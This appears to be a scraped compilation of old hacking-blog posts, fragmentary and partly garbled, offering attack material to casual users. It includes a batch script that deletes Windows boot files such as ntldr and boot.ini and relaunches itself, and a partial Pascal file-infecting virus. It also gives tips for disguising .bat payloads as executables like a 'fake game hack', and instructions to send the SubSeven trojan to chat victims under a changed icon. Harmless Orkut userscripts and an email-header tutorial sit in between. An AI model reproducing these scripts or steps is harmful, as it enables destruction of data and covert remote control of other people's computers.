Professional Documents
Culture Documents
when it is in .exe form no one will be able to change look or modify the code (note:it
will make it to a self extraction thing but it will still act like a exe)
click extract files and run an installation command and click next
type what you want to name the files (ex. hello,virus,fake game hack) then click next
license agreement unless you want to put one click do not display license
package files(most important) click add then choose your .bat file(also does .vbs files)
under install program choose your .bat or .vbs file and click next(don't worry about the
other one)
click browse and type the name of it and save to desktop or C: then next
their click next and watchyour file change into something better
when its done click finish and check out your new file
try dis
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Enjoy
echo off
cls
del %0
Labels: admin password, administrator, administrator rights, crack admin account, hack, hack a pc, how to
* Now, in the player when the movie is being played, press "Print screen" button on
your key board.
Labels: hack, hack a pc, hack paint, paint, play movie in paint, windows, windows paint, windows xp
we know how to compose email , how to attach a file , how to send it to others ,How
to receive emails from others and many other things.This is all we know about emails.
But this is not end of it .When you receive or send emails many other things are sent
with it.
At this time when Email is progressively used for business and for many purposes, not
to mention it is being used for phishing and other malicious intentions. It is of utmost
priority to understand the other "messages" besides what has been sent or received by
you.
Every email comes with a “Header” which is one part of an e-mail structure; call it
DNA of the mail. It carries the basic fundamental information such as from whom the
email comes, to whom it is addressed, date/time it was sent and the subject of the
This basic information comes in all brief/basic headers that most email programs
automatically shows. This detail technical information can be viewed in a full header.
All email programs can be set to show only brief header or full header and it is up to
the users to set the program whether to view only “brief header” or “full header”.
Full header carries the information of the mail server’s name that the email passed
through on its way to the recipient, and sender's IP address and even the name of the
worth mentioning, understanding of this tool would definitely help people to counter
these attacks, and save themselves from unwarranted consequences. Well, this
Here we will take the case of Google mail and Yahoo mail to find out the full header.
Google Mail.
Using your id/password, login to Gmail. Open the mail for which you wish to find the
full header of the sender. Click on the inverted triangle placed just next to Reply.
Delivered-To: Mr.x@gmail.com
0800 (PST)
Return-Path:
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
From: Mr.y
Subject: Hello
To: Mr.x
From: Mr .y
Subject: Hello
To: Mr.x
2. When the email is sent through the servers of Mr.y's email provider, mail.
emailprovider.com
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
3.When the message transfers from Mr.y 's email provider to Mr. x's Gmail account
Delivered-To: Mr.x@gmail.com
0800 (PST)
Return-Path: Mr.y@emailprovider.com
(PST)
Delivered-To: Mr.x@gmail.com
Return-Path:
(mail.emailprovider.com [111.111.11.111])
Message-ID: 20050329231145.62086.mail@mail.emailprovider.com
15:11:45 PST
Mr.y used an email composition program to write the message, and it was then
From: Mr y
Subject: Hello
To: Mr.x
The date, sender, subject, and destination -- Mr. Jones entered this information
And for IP, look for Received:from followed by the IP within square brackets [ ] e.g.
Also importantly, there are times when you might find multiple Received: from entries,
in that case, please select the last one as the valid choice.
Labels: find IP, How to find senders IP address from received mail, IP hack, mail hacking, mail tracing, trace IP
Program Saddam;
{$M 10000,0,0}
Uses
DOS;
Var
Target,Source : File;
Infected : Byte;
Done : Word;
TargetFile : String;
(*??????????????????????????????????????
???????????????????????????????????*)
Begin
While DosError = 0 Do
Begin
{$i+}
End;
FindNext ( S );
End;
FindNext ( S );
End;
If ( DosError = 0 ) And
( S.Attr And 16 <> 16 ) Then
FindNext ( S );
While DosError = 0 Do
Begin
If ( S.Attr And 16 = 16 ) And ( Infected < 3 ) Then
SearchDir ( Dir2Search + S.Name );
FindNext ( S );
End;
End;
Begin
Randomize;
SearchDir ( DriveID );
End.
;***************************************
*************************************;
;;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp:ruck_fules [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
;;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
;;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
;;
;****************************************************************************
Labels: how to write virus codes, pascal, pascal code, virus code, virus in pascal, virus writing, write virus code
Hacking rapidshare
Tired of waiting for another few minutes after downloads try dis
It works
javascript:var%20counta=0;var%20countb=0
;var%20countc=0;var%20countd=0;var%20countd=0
1. Go to Start->Run and type in "cmd" without quotes to bring up the command prompt.
Hit Enter.
4. Type in "ipconfig /renew" without quotes and hit Enter. You should now have a new
IP address. Check your IP address at IP Chicken again and compare it to the one you got
earlier.
Posted by UTKARSH
http://www.orkut.com/CommMsgs.aspx?cmm=39996086&tid=2561136090838347656
Labels: Eliminate countdown in rapidshare, Eliminate timer in rapidshare, free rapidshare premium account,
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
start virus.bat
virus.bat
virus.bat
Basically this program will delete all that files which are needed for booting
http://www.orkut.com/Profile.aspx?uid=12868172797188978036
Labels: batch, batch program, batch virus, virus code, virus writing
// @namespace http://www.prateek.5u.com
// @namespace http://www.orkut.com/Profile.aspx?uid=4895905875405966859
// @include http://www.orkut.com*
// ==/UserScript==
(function() {
var i1=document.getElementsByTagName('td');
substr(idx2);
i1[0].innerHTML = headerMenu_bar;
'Join Us |'
);
i1[2].innerHTML += "|";
)();
b="";
for(i=0;i if (document.links[i].innerHTML=='News'){
document.links[i].parentNode.innerHTML=document.links[i].parentNode.innerHTML
+"Credits"
;void(0)
// ==UserScript==
// @version 1
// @author Prateek
// @author Bhavik
// @namespace http://prateek.5u.com
// @description Signature
// @include http://www.orkut.com/Scrapbook.aspx?uid=*
// @include http://www.orkut.com/CommMsgPost.aspx?*
// ==/UserScript==
[/b]";
addEventListener('load', function(event) {
function getTextArea(n) {
return document.getElementsByTagName('textarea')[n];
//-----------------------------------------------------------
//-- Org --
//-----------------------------------------------------------
function sign(){
sig=getTextArea(0);
sig.value+=signa;
function sg() {
text=getTextArea(0);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 001 --
//-----------------------------------------------------------
function sign1(){
sig=getTextArea(1);
sig.value+=signa;
function sg1() {
text=getTextArea(1);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 002 --
//-----------------------------------------------------------
function sign2(){
sig=getTextArea(2);
sig.value+=signa;
function sg2() {
text=getTextArea(2);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 003 --
//-----------------------------------------------------------
function sign3(){
sig=getTextArea(3);
sig.value+=signa;
function sg3() {
text=getTextArea(3);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 004 --
//-----------------------------------------------------------
function sign4(){
sig=getTextArea(4);
sig.value+=signa;
function sg4() {
text=getTextArea(4);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 005 --
//-----------------------------------------------------------
function sign5(){
sig=getTextArea(5);
sig.value+=signa;
function sg5() {
text=getTextArea(5);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 006 --
//-----------------------------------------------------------
function sign6(){
sig=getTextArea(6);
sig.value+=signa;
function sg6() {
text=getTextArea(6);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 007 --
//-----------------------------------------------------------
function sign7(){
sig=getTextArea(7);
sig.value+=signa;
function sg7() {
text=getTextArea(7);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 008 --
//-----------------------------------------------------------
function sign8(){
sig=getTextArea(8);
sig.value+=signa;
function sg8() {
text=getTextArea(8);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 009 --
//-----------------------------------------------------------
function sign9(){
sig=getTextArea(9);
sig.value+=signa;
function sg9() {
text=getTextArea(9);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 010 --
//-----------------------------------------------------------
function sign10(){
sig=getTextArea(10);
sig.value+=signa;
function sg10() {
text=getTextArea(10);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 011 --
//-----------------------------------------------------------
function sign11(){
sig=getTextArea(11);
sig.value+=signa;
function sg11() {
text=getTextArea(11);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 012 --
//-----------------------------------------------------------
function sign12(){
sig=getTextArea(12);
sig.value+=signa;
function sg12() {
text=getTextArea(12);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 013 --
//-----------------------------------------------------------
function sign13(){
sig=getTextArea(13);
sig.value+=signa;
function sg13() {
text=getTextArea(13);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 014 --
//-----------------------------------------------------------
function sign14(){
sig=getTextArea(14);
sig.value+=signa;
function sg14() {
text=getTextArea(14);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 015 --
//-----------------------------------------------------------
function sign15(){
sig=getTextArea(15);
sig.value+=signa;
function sg15() {
text=getTextArea(15);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 016 --
//-----------------------------------------------------------
function sign16(){
sig=getTextArea(16);
sig.value+=signa;
function sg16() {
text=getTextArea(16);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 017 --
//-----------------------------------------------------------
function sign17(){
sig=getTextArea(17);
sig.value+=signa;
function sg17() {
text=getTextArea(17);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 018 --
//-----------------------------------------------------------
function sign18(){
sig=getTextArea(18);
sig.value+=signa;
function sg18() {
text=getTextArea(18);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 019 --
//-----------------------------------------------------------
function sign19(){
sig=getTextArea(19);
sig.value+=signa;
function sg19() {
text=getTextArea(19);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 020 --
//-----------------------------------------------------------
function sign20(){
sig=getTextArea(20);
sig.value+=signa;
function sg20() {
text=getTextArea(20);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 021 --
//-----------------------------------------------------------
function sign21(){
sig=getTextArea(21);
sig.value+=signa;
function sg21() {
text=getTextArea(21);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 022 --
//-----------------------------------------------------------
function sign22(){
sig=getTextArea(22);
sig.value+=signa;
function sg22() {
text=getTextArea(22);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 023 --
//-----------------------------------------------------------
function sign23(){
sig=getTextArea(23);
sig.value+=signa;
function sg23() {
text=getTextArea(23);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 024 --
//-----------------------------------------------------------
function sign24(){
sig=getTextArea(24);
sig.value+=signa;
function sg24() {
text=getTextArea(24);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 025 --
//-----------------------------------------------------------
function sign25(){
sig=getTextArea(25);
sig.value+=signa;
function sg25() {
text=getTextArea(25);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 026 --
//-----------------------------------------------------------
function sign26(){
sig=getTextArea(26);
sig.value+=signa;
function sg26() {
text=getTextArea(26);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 027 --
//-----------------------------------------------------------
function sign27(){
sig=getTextArea(27);
sig.value+=signa;
function sg27() {
text=getTextArea(27);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 028 --
//-----------------------------------------------------------
function sign28(){
sig=getTextArea(28);
sig.value+=signa;
function sg28() {
text=getTextArea(28);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 029 --
//-----------------------------------------------------------
function sign29(){
sig=getTextArea(29);
sig.value+=signa;
function sg29() {
text=getTextArea(29);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
//-----------------------------------------------------------
//-- 030 --
//-----------------------------------------------------------
function sign30(){
sig=getTextArea(30);
sig.value+=signa;
function sg30() {
text=getTextArea(30);
if (!text) return;
c=text.parentNode;
d=document.createElement("a");
d.className="T";
d.style.marginTop="10px";
d.style.fontSize="10px";
d.align="Right";
d.innerHTML="Signature";
d.href="javascript:;";
c.appendChild(d);
sg();
sg1();
sg2();
sg3();
sg4();
sg5();
sg6();
sg7();
sg8();
sg9();
sg10();
sg11();
sg12();
sg13();
sg14();
sg15();
sg16();
sg17();
sg18();
sg19();
sg20();
sg21();
sg22();
sg23();
sg24();
sg25();
sg26();
sg27();
sg28();
sg29();
sg30();
}, false);
// ==UserScript==
// @version 1.2
// @author Prateek
// @author Bhavik
// @namespace
// @include http://www.orkut.com/CommMsgPost.aspx?*
// @include http://www.orkut.com/Scrapbook.aspx*
// @include http://www.orkut.com/CommMsgs.aspx?*
// ==/UserScript==
addEventListener('load', function(event) {
function getTextArea() {
return document.getElementsByTagName('textarea')[0];
function mM() {
e=getTextArea();
s=e.value;
r="";
for(k=0;k l=s.substr(k,1);
e.value=r;
//-----------------------------------------------------------
//-- Encrypt --
//-----------------------------------------------------------
function ZP() {
o=getTextArea();
txt=o.value;
crypt["a"]="z";
crypt["b"]="y";
crypt["c"]="x";
crypt["d"]="w";
crypt["e"]="v";
crypt["f"]="u";
crypt["g"]="t";
crypt["h"]="s";
crypt["i"]="r";
crypt["j"]="q";
crypt["k"]="p";
crypt["l"]="o";
crypt["m"]="n";
crypt["n"]="m";
crypt["o"]="l";
crypt["p"]="k";
crypt["q"]="j";
crypt["r"]="i";
crypt["s"]="h";
crypt["t"]="g";
crypt["u"]="f";
crypt["v"]="e";
crypt["w"]="d";
crypt["x"]="c";
crypt["y"]="b";
crypt["z"]="a";
var r="";
for(x=0;x t=txt.substr(x,1).toLowerCase();
o.value=r;
//-----------------------------------------------------------
//-----------------------------------------------------------
function chr(){
s=getTextArea();
txt=s.value;
var n="";
n = txt.charCodeAt(0);
s.value=n;
//-----------------------------------------------------------
//-- Style 1 --
//-----------------------------------------------------------
function stl() {
c = getTextArea();
d = c.value;
"l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","3","6"],
[945, 1074, 99, 962, 8706, 949, 402, 103, 1085, 953, 106, 954, 108,
1084, 960, 920, 961, 113, 1075, 353, 964, 956, 957, 1096, 967, 947,
var r="";
for(x=0;x t=d.substr(x,1).toLowerCase();
for(y=0;y if (t == coeiu[0][y]) {
t = String.fromCharCode(coeiu[1][y]);
break;
r+=t;
c.value=r;
//-----------------------------------------------------------
//-- Style 2 --
//-----------------------------------------------------------
function ZPs() {
s=getTextArea();
txt=s.value;
crypt["A"]=String.fromCharCode(0xC3);
crypt["B"]=String.fromCharCode(0xDF);
crypt["C"]=String.fromCharCode(0xA9);
crypt["D"]=String.fromCharCode(0xD0);
crypt["E"]=String.fromCharCode(163);
crypt["F"]="F";
crypt["G"]="G";
crypt["H"]="|-|";
crypt["I"]="I";
crypt["J"]="J";
crypt["K"]="|<";
crypt["L"]="|_";
crypt["M"]="|V|";
crypt["N"]=String.fromCharCode(0xD1);
crypt["O"]=String.fromCharCode(0xD8);
crypt["P"]="P";
crypt["Q"]="Q";
crypt["R"]=String.fromCharCode(0xAE);
crypt["S"]=String.fromCharCode(0xA7);
crypt["T"]="T";
crypt["U"]=String.fromCharCode(0xDC);
crypt["V"]="V";
crypt["W"]="W";
crypt["X"]="><";
crypt["Y"]=String.fromCharCode(0xA5);
crypt["Z"]="Z";
crypt["a"]=String.fromCharCode(0xE3);
crypt["b"]="b";
crypt["c"]=String.fromCharCode(0xE7);
crypt["d"]="d";
crypt["e"]=String.fromCharCode(0xEA);
crypt["f"]=String.fromCharCode(402);
crypt["g"]="9";
crypt["h"]="h";
crypt["i"]=String.fromCharCode(0xEE);
crypt["j"]="j";
crypt["k"]="k";
crypt["l"]="l";
crypt["m"]="m";
crypt["n"]=String.fromCharCode(0xF1);
crypt["o"]=String.fromCharCode(0xF5);
crypt["p"]=String.fromCharCode(0xDE);
crypt["q"]=String.fromCharCode(0xB6);
crypt["r"]="r";
crypt["s"]="s";
crypt["t"]=String.fromCharCode(8224);
crypt["u"]=String.fromCharCode(0xB5);
crypt["v"]="v";
crypt["w"]="w";
crypt["x"]=String.fromCharCode(0xA4);
crypt["y"]=String.fromCharCode(0xFF);
crypt["z"]="z";
var r="";
for(x=0;x t=txt.substr(x,1);
s.value=r;
//-----------------------------------------------------------
//-- lines --
//-----------------------------------------------------------
function cerc() {
v=getTextArea();
v.value=v.value.replace(/\b/gi,"|");
//-----------------------------------------------------------
//-- Colorful 1 --
//-----------------------------------------------------------
function colorful() {
cor=new Array('maroon','red','orange','green','blue','navy');
var z=0;
cl=getTextArea();
cl.value=cl.value.replace(/(.)/gi,"#$1");
for(y=0;y cl.value=cl.value.replace(/\#/,'['+cor[z]+']');
z++;
if(z==cor.length)
z=0;
var cd=cl.value;
cl.value="[silver]"+cd+"[/silver]";
//-----------------------------------------------------------
//-- Box --
//-----------------------------------------------------------
function box() {
z=getTextArea();
z.value="[b]"+"["+z.value.replace(/|/g,String.fromCharCode(773)+String.fromCharCode
(818))+"]";
//-----------------------------------------------------------
//-- Heart --
//-----------------------------------------------------------
function hea() {
y=getTextArea();
y.value="[b]"+"("+String.fromCharCode(773)+String.fromCharCode(818)+String.
fromCharCode(9829)+String.fromCharCode(773)+String.fromCharCode(818)+"|"+y.value.
replace(/|/g,String.fromCharCode(773)+String.fromCharCode(818))+"|"+String.
fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(9829)+String.
fromCharCode(773)+String.fromCharCode(818)+")";
//-----------------------------------------------------------
//-- Dot --
//-----------------------------------------------------------
function dot() {
e=getTextArea();
e.value="[b]"+"("+String.fromCharCode(773)+String.fromCharCode(818)+":"+String.
fromCharCode(773)+String.fromCharCode(818)+":"+String.fromCharCode(773)+String.
fromCharCode(818)+"|"+e.value.replace(/|/g,String.fromCharCode(773)+String.
fromCharCode(818))+"|"+String.fromCharCode(773)+String.fromCharCode(818)
+":"+String.fromCharCode(773)+String.fromCharCode(818)+":"+String.fromCharCode(773)
+String.fromCharCode(818)+")";
//-----------------------------------------------------------
//-----------------------------------------------------------
function BhavikWrite() {
text=getTextArea();
if (!text) return;
c=text.parentNode;
d=document.createElement("div");
d.className="T";
d.style.fontSize="11px";
d.align="left";
d.innerHTML=""+String.fromCharCode(1074)+String.fromCharCode(1085)+String.
fromCharCode(945)+String.fromCharCode(957)+String.fromCharCode(953)+String.
fromCharCode(954)+String.fromCharCode(38)+String.fromCharCode(961)+String.
fromCharCode(1075)+String.fromCharCode(945)+String.fromCharCode(964)+String.
fromCharCode(949)+String.fromCharCode(949)+String.fromCharCode(954)+" All In
One !!!
";
d.style.marginTop="10px";
c.appendChild(d);
zp=document.createElement("a");
zp.href="javascript:;";
zp.innerHTML="Encrypt or Decrypt";
d.appendChild(zp);
SPA=document.createElement("b");
SPA.innerHTML=" - ";
d.appendChild(SPA);
mm=document.createElement("a");
mm.href="javascript:;";
mm.innerHTML="aLtErNaTe";
d.appendChild(mm);
SPB=document.createElement("b");
SPB.innerHTML=" - ";
d.appendChild(SPB);
ce=document.createElement("a");
ce.href="javascript:;";
ce.innerHTML="|Lines|";
d.appendChild(ce);
SPC=document.createElement("b");
SPC.innerHTML=" - ";
d.appendChild(SPC);
ss=document.createElement("a");
ss.href="javascript:;";
ss.innerHTML=String.fromCharCode(353)+String.fromCharCode(964)+String.
fromCharCode(947)+String.fromCharCode(108)+String.fromCharCode(949);
d.appendChild(ss);
SPD=document.createElement("b");
SPD.innerHTML=" - ";
d.appendChild(SPD);
s2=document.createElement("a");
s2.href="javascript:;";
s2.innerHTML=String.fromCharCode(0xA7)+String.fromCharCode(964)+String.
fromCharCode(947)+String.fromCharCode(108)+String.fromCharCode(949);
d.appendChild(s2);
SPE=document.createElement("b");
SPE.innerHTML=" - ";
d.appendChild(SPE);
color=document.createElement("a");
color.href="javascript:;";
color.innerHTML="Colorfull";
d.appendChild(color);
SPE=document.createElement("b");
SPE.innerHTML=" - ";
d.appendChild(SPE);
bo=document.createElement("a");
bo.href="javascript:;";
bo.innerHTML="["+String.fromCharCode(773)+String.fromCharCode(818)+"B"+String.
fromCharCode(773)+String.fromCharCode(818)+"o"+String.fromCharCode(773)+String.
fromCharCode(818)+"x"+String.fromCharCode(773)+String.fromCharCode(818)+"]";
d.appendChild(bo);
SPE=document.createElement("b");
SPE.innerHTML=" - ";
d.appendChild(SPE);
he=document.createElement("a");
he.href="javascript:;";
he.innerHTML="("+String.fromCharCode(9829)+String.fromCharCode(773)+String.
fromCharCode(818)+"H"+String.fromCharCode(773)+String.fromCharCode(818)
+"e"+String.fromCharCode(773)+String.fromCharCode(818)+"a"+String.fromCharCode
(773)+String.fromCharCode(818)+"r"+String.fromCharCode(773)+String.fromCharCode
(818)+"t"+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode
(9829)+")";
d.appendChild(he);
SPE=document.createElement("b");
SPE.innerHTML=" - ";
d.appendChild(SPE);
dt=document.createElement("a");
dt.href="javascript:;";
dt.innerHTML="("+String.fromCharCode(773)+String.fromCharCode(818)+String.
fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+String.
fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+"B"+String.
fromCharCode(773)+String.fromCharCode(818)+"a"+String.fromCharCode(773)+String.
fromCharCode(818)+"n"+String.fromCharCode(773)+String.fromCharCode(818)
+"d"+String.fromCharCode(773)+String.fromCharCode(818)+"-"+String.fromCharCode
(773)+String.fromCharCode(818)+"A"+String.fromCharCode(773)+String.fromCharCode
(818)+"i"+String.fromCharCode(773)+String.fromCharCode(818)+"d"+String.
fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+String.
fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+")";
d.appendChild(dt);
BhavikWrite();
}, false);
//-----------------------------------------------------------
//-----------------------------------------------------------
var i=0;
function chngimg(){
doc=document;
lnk=doc.links;
for (i=0;igetload="document.getElementById('loadi"+i+"')"
this2="document.getElementById('bfimg"+i+"')"
var sb=lnk[i].href.substring(lnk[i].href.length-4,lnk[i].href.length);sb=sb.toLowerCase()
(imgw"+i+">imgh"+i+"){document.getElementById('bfimg"+i+"').width=imgw"+i+"};aa"+i
width=200;};this.style.display='';"+getload+".style.display='none';\">"
}}
chngimg()
//-----------------------------------------------------------
//-- Tags --
//-----------------------------------------------------------
function changetags(){
br=document.body.innerHTML
br=br.replace(/\[img\]/gi,'');
br=br.replace(/\[\/img\]/gi,'');
document.body.innerHTML = br;
changetags()
Mobile hacker
Yes guys it is the super mobile bluetooth hacker
- change profile
Call from his phone" it includes all call functions like hold etc.
Notes:
download
Labels: Bluetooth hacking, bluetooth mobile hacking, hack any mobile, hack bluetooth, hack mobile, Mobile
here
Download subseven
It is having great features like KEYLOGGER , REMOTE ACCESS , FTP in it which u will not
find any other software you can do anything with victim's pc remotely after running ist
me.exe in victim's pc
ist me.exe is given in this pack .Just run this file on victim's pc and do whatever you
want with his pc remotely
You can also use resource hacker to change ist me.exe's icon and make it attractive
and send it to the victim while chatting on yahoo messenger or gtalk
And if you hv direct access to his pc then just run this file on his pc
That's it.
Labels: hack, hack a pc, hack while chatting, hacking, hacking a pc, how to hack a pc, remote access, remote
But you don't know which ports are open in your friend's pc,so u r not able to hack pc
http://rapidshare.com/files/62036500/Advanced_Port_Scanner.zip
In 10 seconds it will give u the result and will show all open and closed ports in ur
friends pc
That's it
Labels: hack a pc, hack while chatting, hacking, hacking a pc, how to hack a pc, how to scan ports, open ports,
http://rapidshare.com/files/61785563/BuddySpySetup.exe
If you r scanning for a person be sure that he/she is in your friends list
If he/she is not in your friends list then you may not get right result
enjoy
Labels: buddy spy, find invisible peoples on yahoo messenger, see who is invisible in yahoo, spy your friends,
yahoo messenger
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u
1) When we chat on yahoo every thing goes through the server.Only when we chat
thats messages.
a) Either it uploads the file and then the other client has to down load it.
And when we have client to client connection the opponents IP is revealed.On the 5051
port.So how do we exploit the Chat user when he gets a direct connection. And how do
we go about it.Remember i am here to hack a system with out using a TOOL only by
simple net commands and yahoo chat techniques.Thats what makes a difference
So lets analyse
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Active Connections
Just i will explain what the out put is in general.In left hand side is your IP address.And
in right hand side is the IP address of the foreign machine.And the port to which is
